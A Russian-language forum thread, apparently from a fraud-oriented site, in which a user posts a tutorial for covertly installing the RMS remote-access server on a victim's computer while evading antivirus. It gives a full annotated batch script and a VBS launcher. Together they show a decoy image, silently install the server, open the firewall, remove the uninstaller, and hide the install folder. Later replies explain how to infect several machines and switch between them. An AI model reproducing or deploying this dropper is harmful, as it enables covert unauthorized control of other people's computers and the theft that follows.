1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Новый способ установки РМСины .

Тема в разделе "Наши статьи", создана пользователем SAIND, 26 дек 2012.

1. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Привет всем с вами И СЕЙЧАС Я ВАМ ПОКАЖУ НОВЫЙ СПОСОБ УСТАНОВКИ СЕРВЕРА RMS ,Т.К СТАРЫЙ И ВСЕМ ИЗВЕСТНЫЙ СПОСОБ Не ПРОПУСКАЮТ АНТИВИРУСЫ И ВОТ Я ПРИДУМАЛ КАК ЭТО ОБОЙТИ СНАЧАЛА Я ВАМ ПОКАЖУ КАК РУГАЕТСЯ АНТИВИРУС НА СТАРЫЙ СПОСОБ А ПОТОМ КАК РАБОТАЕТ НОВЫЙ .Проверял не ругается Аваст 2012 не ругается касперский 2010 обновленный .Сервер устанавливается как вы бы его просто скачали и начали устанавливать себе на компьтер ток теперь не используется в качестве запуска EXE.Запускается все Bat Файлом в скрытом режиме без вывода окна консоли CMD чтобы не было подозрений на программу .В батнике я прописал чтобы папка с сервером стала скрытой и системной .В панели меню удалил удалялку чтобы было не удалить но удалить можно при помощи панели инструментов но думаю когда сервер устанавливается не чего не ругается жертва и не будет искать эту программу.
    Вот видео :
    Так а теперь теории .
    Вот батинок :
    Код:
    @echo off
    CHCP 1251
    start full.jpg /S
    ping -n 20 127.0.0.1 > NUL
    net stop RManService
    taskkill /im rutserv.exe /f
    taskkill /im rfusclient.exe /f
    taskkill /im HookDrv.dll /f
    taskkill /im rversionlib.dll /f
    start ru.msi /quiet
    ping -n 20 127.0.0.1 > NUL
    taskkill /im rutserv.exe /f
    taskkill /im rfusclient.exe /f
    taskkill /im HookDrv.dll /f
    taskkill /im rversionlib.dll /f
    reg import "%SystemRoot%\key.reg"
    reg import "key.reg"
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /firewall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /silentinstall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /start
    cd "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\"
    del /s /q "Remote Manipulator System - Server"
    cd "C:\Documents and Settings\All Users\Главное меню\Программы\"
    del /s /q "Remote Manipulator System - Server"
    attrib +a +s +r +h "C:\Program Files\Remote Manipulator System - Server"
    exit
    Так разберем его :
    @echo off -скрываем все
    CHCP 1251 -русская раскладка для ХР
    start full.jpg /S -стартует пруга или фотка для отвода глаз (full.jpg) поменять на свой файл
    ping -n 20 127.0.0.1 > NUL- пауза
    net stop RManService -остоновка сервера вдруг он будет у жертвы
    taskkill /im rutserv.exe /f -убиваем процессы сервака
    taskkill /im rfusclient.exe /f -убиваем процессы сервака
    taskkill /im HookDrv.dll /f -убиваем процессы сервака
    taskkill /im rversionlib.dll /f -убиваем процессы сервака
    start ru.msi /quiet -устанавливаем сервер в тихом режиме
    ping -n 20 127.0.0.1 > NUL -Пауза
    taskkill /im rutserv.exe /f --убиваем процессы сервака
    taskkill /im rfusclient.exe /f -убиваем процессы сервака
    taskkill /im HookDrv.dll /f -убиваем процессы сервака
    taskkill /im rversionlib.dll /f -убиваем процессы сервака
    reg import "%SystemRoot%\key.reg" -Экспортируем ключь в реестр
    reg import "key.reg" -Экспортируем ключь в реестр
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /firewall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /silentinstall
    "C:\Program Files\Remote Manipulator System - Server\rutserv.exe" /server /start
    cd "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\" -Идем в папку Programs
    del /s /q "Remote Manipulator System - Server" -Удоляем папку Remote Manipulator System - Server
    cd "C:\Documents and Settings\All Users\Главное меню\Программы\"-идем в папку Программы
    del /s /q "Remote Manipulator System - Server"-Удоляем папку Remote Manipulator System - Server
    attrib +a +s +r +h "C:\Program Files\Remote Manipulator System - Server" -делаем невидимой папку Remote Manipulator System - Server
    exit -Все выходим сервак установлен

Так теперь скрипт чтобы не вылетала консоль CMD:
    Код:
    Dim oShell
    Set oShell = WScript.CreateObject ("WSCript.shell")
    oShell.run "start.bat", 0
    Set oShell = Nothing

Разберем его :
    Dim oShell
    Set oShell = WScript.CreateObject ("WSCript.shell")
    oShell.run "start.bat", 0 -За место start.bat Ваше имя ботика у меня start.bat
    Set oShell = Nothing

Потом делаем ярлык и ставим на него иконку лудше с системы с адреса %SystemRoot%\system32\SHELL32.dll тогда точно будет иконка.
    Для тестирования можете скачать тест который я делал в видео Войти или зарегистрироваться, чтобы увидеть ссылку.
    Сам клиент можно скачать Войти или зарегистрироваться, чтобы увидеть ссылку.
    P.S Расписывать на пол стронции не стал Войти или зарегистрироваться, чтобы увидеть ссылку.

• Like Like x 9
    Метки:
  2. Ltybcrf

Ltybcrf Гость

Витя красавчик как всегда )

3. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    :!!!Этот Ебан*****ый Войти или зарегистрироваться, чтобы увидеть ссылку. удолили все мои файлы во всех моих темах :( Буду теперь лить на Войти или зарегистрироваться, чтобы увидеть ссылку. там хоть файлы хоронятся .Вскоре переваливать буду и Е******бал я Войти или зарегистрироваться, чтобы увидеть ссылку. Депозит уже проверен у меня временем .Файл который закачивал год назад до сихпор лежит на депозите .
    Перелазил Сейчас буду по всем темам моим ходить там тоже все по удоляли этот Войти или зарегистрироваться, чтобы увидеть ссылку..

4. Serge

Serge

Симпатии:
    38
    появился вопрос, как я понимаю этот способ только для 1 компа так как ид же один или все же можно будит распространить на множество компов и для всех просто будит тупо 1 ид и все будит работать? то есть к примеру таким способом я зарозил несколько компов и они все появятся в списке для подключение и при нажатии на определенном компе тот и откроется?

5. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Да на один комп .но если им зарозить 10 копов то будет врубатся ближайший если он тебе не нужен его просто в свойствах рмс вырубаешь через диспетчер задач и потом коненктишся уже к другому и так далие то есть не надо забивать кучай Id свой рмс ,А если нужна конкретная тачка то просто поменяй ключь и конекся

6. Serge

Serge

Симпатии:
    38
    пробовал удаленно сменить ID там в настройках есть такое но не чего не вышло :(

7. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Создаёшь новый ключ реестра у себя на компе с новым id , пишешь батинок ботинок сначало должен выключить сервер а потом поменять ключь реестра а потом запустить сервер ,Дошло надеюсь до тебя .Все хорошо меняется ,еще проверь на ip может у него прямой ip то есть запускаешь толнет и пишешь ipconfig и вылитит его ip (ip будет прописан в протоколе 4 ) попробуй к нему подконекся 50% компов сидят на прямом ip а не через NAT тоесть и ключ менять не надо .

8. Serge

Serge

Симпатии:
    38
    да это уже придумал :) просто писал то я вчера :)

Поделиться этой страницей

Загрузка...